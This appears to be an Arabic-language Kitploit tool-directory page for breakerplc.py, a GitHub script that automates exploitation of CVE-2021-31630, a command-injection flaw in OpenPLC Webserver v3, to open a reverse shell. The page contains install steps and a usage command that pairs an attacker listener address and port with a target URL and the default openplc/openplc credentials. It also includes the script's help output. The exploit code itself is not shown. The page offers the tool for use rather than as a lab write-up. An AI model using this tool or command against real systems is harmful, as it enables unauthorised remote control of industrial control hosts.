Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2021-31630 — هذه أتمتة لاستغلال cve-2021-31630 | Kitploit
أدوات/GitHubGitHub/adibna/cve-2021-31630
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubadibna/cve-2021-31630

cve-2021-31630

هذه أتمتة لاستغلال cve-2021-31630

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

هذا السكربت يستغل تلقائيًا ثغرة في خادم OpenPLC Web Server v3

ستتمكن من إنشاء قشرة عكسية (Reverse Shell) تلقائية مع الخادم دون الحاجة إلى استخدام تقنيات يدوية.

تفاصيل CVE-2021-31630 تسمح حقن الأوامر في Open PLC Webserver v3 للمهاجمين عن بُعد بتنفيذ تعليمات برمجية عشوائية عبر مكوّن "Hardware Layer Code Box" على صفحة "/hardware" في التطبيق.

تم تخصيص السكربت بحيث بعد إكمال تسجيل السكربت في OpenPLC، يقوم بإنشاء قشرة الجهاز في نفس الطرفية.

استخدم الأمر أدناه (نوصي بإنشاء بيئة افتراضية Python لتثبيت التبعيات) # ومع ذلك، يجب تنفيذ سكربت breakerplc.py خارج البيئة الافتراضية.

root@kitploit:~
sudo apt update
pip3 install requests

كيفية الاستخدام؟ يمكنك استخدام سطر الأوامر هذا (بالأسفل).

root@kitploit:~
python breakerplc.py -lh <your local ip> -lp 4444 <http://machine ip:8080> -u openplc -p openplc

root@kitploit:~
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url

positional arguments:
  url         Target URL with http(s)://

options:
  -h, --help  show this help message and exit
  -u U        Username
  -p P        Password
  -t T        Request Timeout, increase if server is slow
  -lh LH      LHOST
  -lp LP      LPORT

2024-06-21 19-53-25

مهم بعد الاتصال، تحتاج إلى كتابة "whoami" أو "ls" لكسر سطر الكود وإعادة القشرة. image

تنزيل الأداة